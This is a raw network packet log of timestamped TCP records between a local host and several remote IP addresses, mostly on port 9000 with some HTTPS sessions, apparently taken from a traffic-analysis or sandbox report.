Jul 1, 2024 09:16:32.472203970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.472210884 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.472217083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.472249985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.472812891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.472852945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.472857952 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.472866058 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.472893000 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.472923040 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.472937107 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.472949028 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.472963095 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.472982883 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.473000050 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.473258018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.473304987 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.476557970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.476592064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.476604939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.476617098 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.476629019 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.476643085 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.476655006 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.476665020 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.476680040 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.476696968 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.476699114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.476708889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.476736069 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.476768017 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.478199959 CEST	443	49788	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.478267908 CEST	49788	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.489701033 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.489748955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.489761114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.489773989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.489809990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.489816904 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.489829063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.489840984 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.489855051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.489860058 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.489876986 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.489900112 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.508117914 CEST	49791	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.508152962 CEST	443	49791	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:32.509891033 CEST	49791	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.510235071 CEST	443	49789	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.510298967 CEST	49789	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.510765076 CEST	49791	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.510780096 CEST	443	49791	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:32.511476994 CEST	49789	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.511485100 CEST	443	49789	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.511743069 CEST	443	49789	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.515001059 CEST	49789	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.515023947 CEST	49789	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.515074015 CEST	443	49789	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.524358988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.524430037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.524442911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.524502993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.524511099 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.524517059 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.524530888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.524543047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.524558067 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.524578094 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.545794964 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.545809031 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.545819998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.545857906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.545869112 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.545875072 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.545881987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.545893908 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.545913935 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.545933008 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.549081087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.549093962 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.549105883 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.549155951 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.549182892 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.549195051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.549206972 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.549218893 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.549245119 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.549256086 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.551336050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.551378965 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.551389933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.551445961 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.551451921 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.551462889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.551474094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.551486015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.551512957 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.551523924 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.552522898 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552551031 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552562952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552608013 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.552635908 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552648067 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552659988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552671909 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552696943 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.552709103 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.552793980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552805901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552823067 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552834988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552846909 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552850962 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.552860022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552877903 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.552897930 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.552905083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.552946091 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.559731007 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559781075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559798956 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.559824944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559837103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559839010 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.559849024 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559871912 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.559885025 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.559933901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559952021 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559963942 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.559976101 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560003996 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560024023 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560097933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560110092 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560122013 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560137033 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560148954 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560161114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560167074 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560173988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560185909 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560192108 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560209990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560223103 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560292959 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560306072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560317993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560332060 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560347080 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560357094 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560436010 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560446978 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560457945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560470104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560487986 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560493946 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560506105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560518026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560523987 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560543060 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560565948 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560851097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560864925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560878038 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560905933 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560926914 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.560937881 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560950041 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560961962 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.560975075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561002970 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.561026096 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.561366081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561384916 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561397076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561438084 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.561511040 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561523914 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561536074 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561548948 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.561578989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.561593056 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.563175917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563189030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563200951 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563251019 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.563254118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563266039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563277960 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563290119 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563321114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.563334942 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.563781977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563793898 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563813925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563826084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563833952 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.563839912 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563851118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563862085 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.563867092 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.563908100 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.563935041 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.567384005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.567409992 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.567446947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.567457914 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.567457914 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.567487001 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.567501068 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.567512989 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.567536116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.567549944 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.567562103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.567578077 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.567606926 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.572047949 CEST	49788	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.572076082 CEST	443	49788	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.572427988 CEST	443	49788	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.580522060 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.580537081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.580548048 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.580602884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.580615044 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.580622911 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.580627918 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.580640078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.580655098 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.580682993 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.592080116 CEST	49792	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.592123985 CEST	443	49792	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:32.592793941 CEST	49788	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.592823029 CEST	49788	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.592860937 CEST	49792	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.592875004 CEST	443	49788	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.593668938 CEST	49792	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.593683958 CEST	443	49792	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:32.615077019 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615089893 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615101099 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615122080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615133047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615145922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615159035 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615173101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.615204096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.615219116 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.615232944 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.636288881 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.636300087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.636311054 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.636379957 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.636396885 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.636409044 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.636420012 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.636432886 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.636465073 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.636492014 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.636522055 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.637892008 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.639612913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639723063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639734030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639744997 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639758110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639769077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639780998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639792919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.639800072 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.639847040 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.642338037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.642352104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.642364025 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.642375946 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.642416954 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.642452955 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.642550945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.642563105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.642575026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.642600060 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.642611027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.643814087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643826962 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643837929 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643851042 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643858910 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.643862009 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643873930 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.643904924 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.643909931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643953085 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.643968105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643980980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.643991947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.644027948 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.644299984 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.644311905 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.644324064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.644335032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.644345045 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.644347906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.644359112 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.644372940 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.644550085 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650285959 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650304079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650315046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650336981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650373936 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650376081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650388956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650399923 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650413990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650430918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650445938 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650465965 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650516033 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650528908 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650541067 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650585890 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650639057 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650651932 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650664091 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650690079 CEST	49782	9000	192.168.2.4	195.201.251.214
